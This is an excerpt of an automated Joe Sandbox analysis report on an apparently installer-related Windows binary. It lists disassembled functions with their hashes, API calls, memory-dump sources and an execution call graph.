                                                                      • Opcode Fuzzy Hash: f9bd6110b4bfdc9b5ee6fb246937858efea6bd65962bb48b8850d3556bde3a9b
                                                                      • Instruction Fuzzy Hash: C3414771A11249EFDF05EFA8D8409EEBBB1BF08304F04842AF956BB382D7349911CB65
                                                                      Function 00402DB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3___cftoe
                                                                      • String ID: !%x
                                                                      • API String ID: 855520168-1893981228
                                                                      • Opcode ID: fb785ae3813e30c0b2c36c383cac1c0c213704675def089ea741c595e6d21f17
                                                                      • Instruction ID: d0c5e50d023f0615ad5b708951e7708ad4d137762138b31e9c91a8e946496749
                                                                      • Opcode Fuzzy Hash: fb785ae3813e30c0b2c36c383cac1c0c213704675def089ea741c595e6d21f17
                                                                      • Instruction Fuzzy Hash: 0D314D71A01209EBDF04DFA4DA859EEB7B2FF48304F10442AF905BB291E7789E05CB94
                                                                      Function 003ED5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: be6c15f7fac2e1c8013b542196b8bfcd6a159c18b5384d59069d4ead3d7165cc
                                                                      • Instruction ID: 2784418314ca2aeb459339fc345e5d071b1df3815e4c4bbd72346d9ab014381b
                                                                      • Opcode Fuzzy Hash: be6c15f7fac2e1c8013b542196b8bfcd6a159c18b5384d59069d4ead3d7165cc
                                                                      • Instruction Fuzzy Hash: D021E7711083849FD712CF15C859B9BBBE9AF89304F04895DF99857292D734D918C7E3
                                                                      Function 003ED6C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 94935c36b3218fc9b29cc42dc8c5b403234523578bd3a07a76b0f9e74ddbffdd
                                                                      • Instruction ID: 4f147a49adc0d90e8dc1a5ec851bfdf6cfb980fe11851c75f28564e2baa2bf7a
                                                                      • Opcode Fuzzy Hash: 94935c36b3218fc9b29cc42dc8c5b403234523578bd3a07a76b0f9e74ddbffdd
                                                                      • Instruction Fuzzy Hash: 3321D6752083859FD712CF15C845B9BBBE9EBC5300F14891DF99497292C734D918C7A7
                                                                      Function 003ED7B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf
                                                                      • String ID: %$+
                                                                      • API String ID: 589789837-2626897407
                                                                      • Opcode ID: 54167e148ce4377fc763e241f6e8f6bc7bc88d8ce4b097f71b0deaedac52fd1a
                                                                      • Instruction ID: 2d41f47c781006cfad572a0bc12821e449f2853d36e75200a7f7f24dbcad1fbd
                                                                      • Opcode Fuzzy Hash: 54167e148ce4377fc763e241f6e8f6bc7bc88d8ce4b097f71b0deaedac52fd1a
                                                                      • Instruction Fuzzy Hash: 9C21C4712083859FE712CF15C845B9BBBE9EBC5300F14891DF99497292C734D918C7A7
                                                                      Function 003E1CB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 003F1EC4: EnterCriticalSection.KERNEL32(00444844,?,?,?,003E1CE7,00000000,755CD0F6,?,?,?,?,-00000010,00429340,000000FF,?,003E202C), ref: 003F1ECF
                                                                        • Part of subcall function 003F1EC4: LeaveCriticalSection.KERNEL32(00444844,?,?,003E1CE7,00000000,755CD0F6,?,?,?,?,-00000010,00429340,000000FF,?,003E202C), ref: 003F1EFB
                                                                      • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,755CD0F6,?,?,?,?,-00000010,00429340,000000FF,?,003E202C), ref: 003E1D06
                                                                        • Part of subcall function 003E1D70: LoadResource.KERNEL32(00000000,00000000,755CD0F6,00000001,00000000,?,00000000,00429360,000000FF,?,003E1D1C,00000010,?,?,?,-00000010), ref: 003E1D9B
                                                                        • Part of subcall function 003E1D70: LockResource.KERNEL32(00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D,000000FF), ref: 003E1DA6
                                                                        • Part of subcall function 003E1D70: SizeofResource.KERNEL32(00000000,00000000,?,003E1D1C,00000010,?,?,?,-00000010,00429340,000000FF,?,003E202C,?,00000000,0042938D), ref: 003E1DB4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$CriticalSection$EnterFindLeaveLoadLockSizeof
                                                                      • String ID: 0HD$0HD
                                                                      • API String ID: 529824247-962433497
                                                                      • Opcode ID: c826a2ef00076d956dc6b6c05653c5ff8fdcb41d1c55be4b1da4cc585d71d30a
                                                                      • Instruction ID: 5e3b3e210412a5747552dcecf7cff052c209c71dac80a2767c6752b56c77f97a
                                                                      • Opcode Fuzzy Hash: c826a2ef00076d956dc6b6c05653c5ff8fdcb41d1c55be4b1da4cc585d71d30a
                                                                      • Instruction Fuzzy Hash: 80110A36F046686BE7268B59AC41B7BF3D8E789B64F00023EED06D73C0DB359C008294
                                                                      Function 003E80D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 003E8116
                                                                      • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,755CD0F6), ref: 003E8185
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ConvertFreeLocalString
                                                                      • String ID: Invalid SID
                                                                      • API String ID: 3201929900-130637731
                                                                      • Opcode ID: cd45d6eb68f3aa4eb78dce1ae16e3bc8864bc971d69c7c04a52d021ad2e2db05
                                                                      • Instruction ID: 923b0d62c6cfa688091d933066c5909c7c67032bf508f759c9212ee1d4876feb
                                                                      • Opcode Fuzzy Hash: cd45d6eb68f3aa4eb78dce1ae16e3bc8864bc971d69c7c04a52d021ad2e2db05
                                                                      • Instruction Fuzzy Hash: 0921AE74E003559BDB11CF59C819BAFFBB8FF44B04F10465EE806A7280DBB56A458BD4
                                                                      Function 003EC140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EC16B
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003EC1CE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 3988782225-1405518554
                                                                      • Opcode ID: f463ef576e84d112891757f922c9c2b36c2cdd430429a67c94817f48f58ecef6
                                                                      • Instruction ID: f8ec1e89ea809f97985ff8c8f878181a29332c9f76ae44f42e289d371eb0735d
                                                                      • Opcode Fuzzy Hash: f463ef576e84d112891757f922c9c2b36c2cdd430429a67c94817f48f58ecef6
                                                                      • Instruction Fuzzy Hash: 18210270805B88DED721CF68C90474BBFF4EF15710F10869EE48597781D7B5AA04CBA5
                                                                      Function 00407708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407BCF
                                                                      • ___raise_securityfailure.LIBCMT ref: 00407CB7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                      • String ID: @KD
                                                                      • API String ID: 3761405300-3991357333
                                                                      • Opcode ID: c38939752e0d4be7c6b1205a8d298de7c3d848d17758939ef1097b999e876c27
                                                                      • Instruction ID: 1f17eced9f5812614e7adda13fed68acdab163dfb9d39c39aa5769c81e89359d
                                                                      • Opcode Fuzzy Hash: c38939752e0d4be7c6b1205a8d298de7c3d848d17758939ef1097b999e876c27
                                                                      • Instruction Fuzzy Hash: 0D21F8BC9022049BD324CF59F996704BBF4FB8A314F16453AE5088B7A1DBB4A940CF4D
                                                                      Function 003F4077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_
                                                                      • String ID: false$true
                                                                      • API String ID: 2427045233-2658103896
                                                                      • Opcode ID: cce215aac40a3fbe992eee3a5e567ac59de4d4843a1f51eda05c3ce4199fca96
                                                                      • Instruction ID: 59f3761fb8cde771915dd0fdb31636bd58853e36b821439e9ca4eb9d99018b23
                                                                      • Opcode Fuzzy Hash: cce215aac40a3fbe992eee3a5e567ac59de4d4843a1f51eda05c3ce4199fca96
                                                                      • Instruction Fuzzy Hash: CA11D671D00745AEC722EFB4D452B9AB7F4AF09300F00852FE2A59B691DB74E504CB94
                                                                      Function 00407CCA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407CD5
                                                                      • ___raise_securityfailure.LIBCMT ref: 00407D92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                      • String ID: @KD
                                                                      • API String ID: 3761405300-3991357333
                                                                      • Opcode ID: 4271bf4b32d7b27705e880f8399d6309bc021035a6771f615ba5f9efb5161434
                                                                      • Instruction ID: 0d749429659299675fda779341c263b96bb80122f855122d18f36cd97431094a
                                                                      • Opcode Fuzzy Hash: 4271bf4b32d7b27705e880f8399d6309bc021035a6771f615ba5f9efb5161434
                                                                      • Instruction Fuzzy Hash: E711E6BC912244DBD725CF69F9C2744BBB4FB8A304B0A513AE90887361EBB0A541CF5D
                                                                      Function 003F1E15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 003F0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,755CD0F6,?,004293B0,000000FF), ref: 003F0B27
                                                                        • Part of subcall function 003F0B00: GetLastError.KERNEL32(?,00000000,00000000,755CD0F6,?,004293B0,000000FF), ref: 003F0B31
                                                                      • IsDebuggerPresent.KERNEL32(?,?,0043FAD8), ref: 003F1E48
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,0043FAD8), ref: 003F1E57
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003F1E52
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 3511171328-631824599
                                                                      • Opcode ID: dfb877a3dab665f7def3f9cd1fdbda12889cd95ea588e06fad624d5bf6fc9187
                                                                      • Instruction ID: 1721a400d251965b6004ffb115aaca2e66a1119949e8a98a530f33efc9c66c8c
                                                                      • Opcode Fuzzy Hash: dfb877a3dab665f7def3f9cd1fdbda12889cd95ea588e06fad624d5bf6fc9187
                                                                      • Instruction Fuzzy Hash: 64E09270B10711CFC335AF29F904756BBE4AF15704F80882DE982C6651DBB4E844CB92

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:345
                                                                      Total number of Limit Nodes:5
                                                                      execution_graph 34913 d97e5e 34914 d97e6a __FrameHandler3::FrameUnwindToState 34913->34914 34939 d979c1 34914->34939 34916 d97e71 34917 d97fc4 34916->34917 34925 d97e9b ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 34916->34925 34986 d983bd 4 API calls 2 library calls 34917->34986 34919 d97fcb 34987 da854c 23 API calls __FrameHandler3::FrameUnwindToState 34919->34987 34921 d97fd1 34988 da8510 23 API calls __FrameHandler3::FrameUnwindToState 34921->34988 34923 d97fd9 34924 d97eba 34925->34924 34929 d97f3b 34925->34929 34985 da8526 41 API calls 3 library calls 34925->34985 34927 d97f41 34954 d81a20 GetCommandLineW 34927->34954 34950 d984d8 34929->34950 34940 d979ca 34939->34940 34989 d9801c IsProcessorFeaturePresent 34940->34989 34942 d979d6 34990 d9ae59 10 API calls 2 library calls 34942->34990 34944 d979db 34945 d979df 34944->34945 34991 da8fb0 34944->34991 34945->34916 34948 d979f6 34948->34916 35050 d98e90 34950->35050 34952 d984eb GetStartupInfoW 34953 d984fe 34952->34953 34953->34927 34955 d81a60 34954->34955 35051 d74ec0 LocalAlloc 34955->35051 34957 d81a71 35052 d78ba0 34957->35052 34959 d81ac9 34960 d81add 34959->34960 34961 d81acd 34959->34961 35060 d80b70 LocalAlloc LocalAlloc 34960->35060 35107 d78790 81 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 34961->35107 34964 d81ad6 34966 d81c26 ExitProcess 34964->34966 34965 d81ae9 35061 d80e90 34965->35061 34968 d81b01 35068 d729d0 34968->35068 34972 d81b2b 35079 d7ae00 34972->35079 34974 d81b82 34975 d729d0 44 API calls 34974->34975 34977 d81bb4 34974->34977 34975->34977 34979 d81c08 34977->34979 35085 d78e20 34977->35085 34978 d81bef 34978->34979 34980 d81bfb 34978->34980 35109 d74000 42 API calls 34979->35109 35108 d81400 CreateFileW SetFilePointer WriteFile CloseHandle 34980->35108 34983 d81c17 35110 d81c30 LocalFree LocalFree 34983->35110 34985->34929 34986->34919 34987->34921 34988->34923 34989->34942 34990->34944 34995 db154e 34991->34995 34994 d9ae78 7 API calls 2 library calls 34994->34945 34996 db155e 34995->34996 34997 d979e8 34995->34997 34996->34997 34999 dac2f6 34996->34999 34997->34948 34997->34994 35000 dac302 __FrameHandler3::FrameUnwindToState 34999->35000 35011 da72ca EnterCriticalSection 35000->35011 35002 dac309 35012 db1abc 35002->35012 35007 dac322 35026 dac246 GetStdHandle GetFileType 35007->35026 35008 dac338 35008->34996 35010 dac327 35027 dac34d LeaveCriticalSection std::_Lockit::~_Lockit 35010->35027 35011->35002 35013 db1ac8 __FrameHandler3::FrameUnwindToState 35012->35013 35014 db1af2 35013->35014 35015 db1ad1 35013->35015 35028 da72ca EnterCriticalSection 35014->35028 35036 d9c6b0 14 API calls std::_Stodx_v2 35015->35036 35018 db1ad6 35037 d9c5b2 41 API calls collate 35018->35037 35020 db1b2a 35038 db1b51 LeaveCriticalSection std::_Lockit::~_Lockit 35020->35038 35021 dac318 35021->35010 35025 dac190 44 API calls 35021->35025 35024 db1afe 35024->35020 35029 db1a0c 35024->35029 35025->35007 35026->35010 35027->35008 35028->35024 35039 dac72b 35029->35039 35031 db1a1e 35035 db1a2b 35031->35035 35046 dacddf 6 API calls std::_Locinfo::_Locinfo_ctor 35031->35046 35033 db1a80 35033->35024 35047 daaa28 14 API calls 2 library calls 35035->35047 35036->35018 35037->35021 35038->35021 35045 dac738 __cftoe 35039->35045 35040 dac778 35049 d9c6b0 14 API calls std::_Stodx_v2 35040->35049 35041 dac763 RtlAllocateHeap 35043 dac776 35041->35043 35041->35045 35043->35031 35045->35040 35045->35041 35048 db15f6 EnterCriticalSection LeaveCriticalSection __cftoe 35045->35048 35046->35031 35047->35033 35048->35045 35049->35043 35050->34952 35051->34957 35054 d78bf2 35052->35054 35053 d78c34 35055 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35053->35055 35054->35053 35057 d78c22 35054->35057 35056 d78c42 35055->35056 35056->34959 35111 d97708 35057->35111 35059 d78c30 35059->34959 35060->34965 35062 d80ea4 35061->35062 35063 d81242 35061->35063 35062->35063 35064 d812a0 35062->35064 35063->34968 35063->35063 35119 d783e0 14 API calls 35064->35119 35066 d812b0 RegOpenKeyExW 35066->35063 35067 d812ce RegQueryValueExW 35066->35067 35067->35063 35069 d729f1 35068->35069 35069->35069 35120 d73b40 35069->35120 35071 d72a09 35072 d79110 35071->35072 35139 d72a10 35072->35139 35074 d79156 35157 d798d0 35074->35157 35080 d7ae0d 35079->35080 35081 d7ae0a 35079->35081 35082 d7ae1a ___vcrt_InitializeCriticalSectionEx 35080->35082 35205 da0f1e 42 API calls 2 library calls 35080->35205 35081->34974 35082->34974 35084 d7ae2d 35084->34974 35086 d78e54 35085->35086 35087 d78e69 35085->35087 35086->34978 35206 d75f90 GetCurrentProcess OpenProcessToken 35087->35206 35089 d78e7c 35090 d78f3e 35089->35090 35092 d78e96 35089->35092 35091 d71fc0 67 API calls 35090->35091 35093 d78f65 35091->35093 35211 d71fc0 35092->35211 35095 d71fc0 67 API calls 35093->35095 35097 d78f7a 35095->35097 35096 d78eaa 35098 d71fc0 67 API calls 35096->35098 35099 d71fc0 67 API calls 35097->35099 35100 d78ec7 35098->35100 35101 d78f8b 35099->35101 35102 d71fc0 67 API calls 35100->35102 35277 d77660 35101->35277 35104 d78ed5 35102->35104 35230 d76ee0 35104->35230 35106 d78eed 35106->34978 35107->34964 35108->34979 35109->34983 35110->34966 35112 d97711 IsProcessorFeaturePresent 35111->35112 35113 d97710 35111->35113 35115 d97bd9 35112->35115 35113->35059 35118 d97b9c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35115->35118 35117 d97cbc 35117->35059 35118->35117 35119->35066 35121 d73c15 35120->35121 35128 d73b54 35120->35128 35137 d73680 42 API calls collate 35121->35137 35122 d73b60 _LStrxfrm 35122->35071 35124 d73b8d 35127 d73c10 35124->35127 35132 d73bbf LocalAlloc 35124->35132 35125 d73c1a 35138 d9c5c2 41 API calls 2 library calls 35125->35138 35136 d73af0 RaiseException Concurrency::cancel_current_task collate 35127->35136 35128->35122 35128->35124 35128->35127 35131 d73bd7 35128->35131 35134 d73bdb LocalAlloc 35131->35134 35135 d73be8 _LStrxfrm 35131->35135 35132->35125 35133 d73bcc 35132->35133 35133->35135 35134->35135 35135->35071 35142 d72a36 35139->35142 35140 d72afc 35195 d73680 42 API calls collate 35140->35195 35141 d72a52 _LStrxfrm 35141->35074 35142->35140 35142->35141 35144 d72a77 35142->35144 35147 d72af7 35142->35147 35149 d72ac1 35142->35149 35144->35147 35150 d72aa9 LocalAlloc 35144->35150 35145 d72b01 35196 d9c5c2 41 API calls 2 library calls 35145->35196 35194 d73af0 RaiseException Concurrency::cancel_current_task collate 35147->35194 35152 d72ac5 LocalAlloc 35149->35152 35156 d72ad2 _LStrxfrm 35149->35156 35150->35145 35151 d72ab6 35150->35151 35151->35156 35152->35156 35156->35074 35158 d7992a ___vcrt_InitializeCriticalSectionEx 35157->35158 35163 d79a92 ___vcrt_InitializeCriticalSectionEx 35157->35163 35162 d79955 35158->35162 35158->35163 35159 d79a79 35160 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35159->35160 35161 d7916b 35160->35161 35184 d79bf0 35161->35184 35164 d79972 35162->35164 35165 d79bd1 35162->35165 35163->35159 35167 d79bdb 35163->35167 35168 d79aeb 35163->35168 35169 d73b40 44 API calls 35164->35169 35200 d74650 42 API calls 35165->35200 35202 d74650 42 API calls 35167->35202 35172 d73b40 44 API calls 35168->35172 35173 d79996 35169->35173 35170 d79bd6 35201 d9c5c2 41 API calls 2 library calls 35170->35201 35176 d79b0f 35172->35176 35197 d79ef0 45 API calls _LStrxfrm 35173->35197 35199 d73cc0 42 API calls collate 35176->35199 35179 d799b1 35198 d73cc0 42 API calls collate 35179->35198 35181 d79a6e 35181->35159 35183 d79a72 LocalFree 35181->35183 35182 d799fa 35182->35159 35182->35170 35182->35181 35183->35159 35193 d79c6c _LStrxfrm 35184->35193 35185 d79183 35185->34972 35186 d79e96 35186->35185 35188 d79eb0 LocalFree 35186->35188 35187 d79ee0 35203 d9c5c2 41 API calls 2 library calls 35187->35203 35188->35185 35190 d79ee5 35204 d74650 42 API calls 35190->35204 35193->35185 35193->35186 35193->35187 35193->35190 35197->35179 35198->35182 35199->35159 35205->35084 35207 d75fb7 GetTokenInformation 35206->35207 35208 d75fb1 35206->35208 35209 d75fe6 35207->35209 35210 d75fee CloseHandle 35207->35210 35208->35089 35209->35210 35210->35089 35326 d72510 35211->35326 35214 d720ea 35345 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35214->35345 35216 d7208f 35221 d7209f 35216->35221 35346 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35216->35346 35218 d71ffa 35218->35221 35341 d71cb0 10 API calls 35218->35341 35219 d720fe 35221->35096 35221->35221 35222 d7202c 35222->35221 35223 d72036 FindResourceW 35222->35223 35223->35221 35224 d7204e 35223->35224 35342 d71d70 LoadResource LockResource SizeofResource 35224->35342 35226 d72058 35226->35221 35227 d7207f 35226->35227 35343 d72750 41 API calls 35226->35343 35344 d9c995 41 API calls 3 library calls 35227->35344 35231 d75f90 4 API calls 35230->35231 35232 d76f2d 35231->35232 35233 d76f55 CoInitialize CoCreateInstance 35232->35233 35234 d76f33 35232->35234 35236 d76f8f 35233->35236 35237 d76f98 VariantInit 35233->35237 35235 d77660 90 API calls 35234->35235 35238 d76f4d 35235->35238 35236->35238 35241 d774f6 CoUninitialize 35236->35241 35239 d76fde 35237->35239 35242 d97708 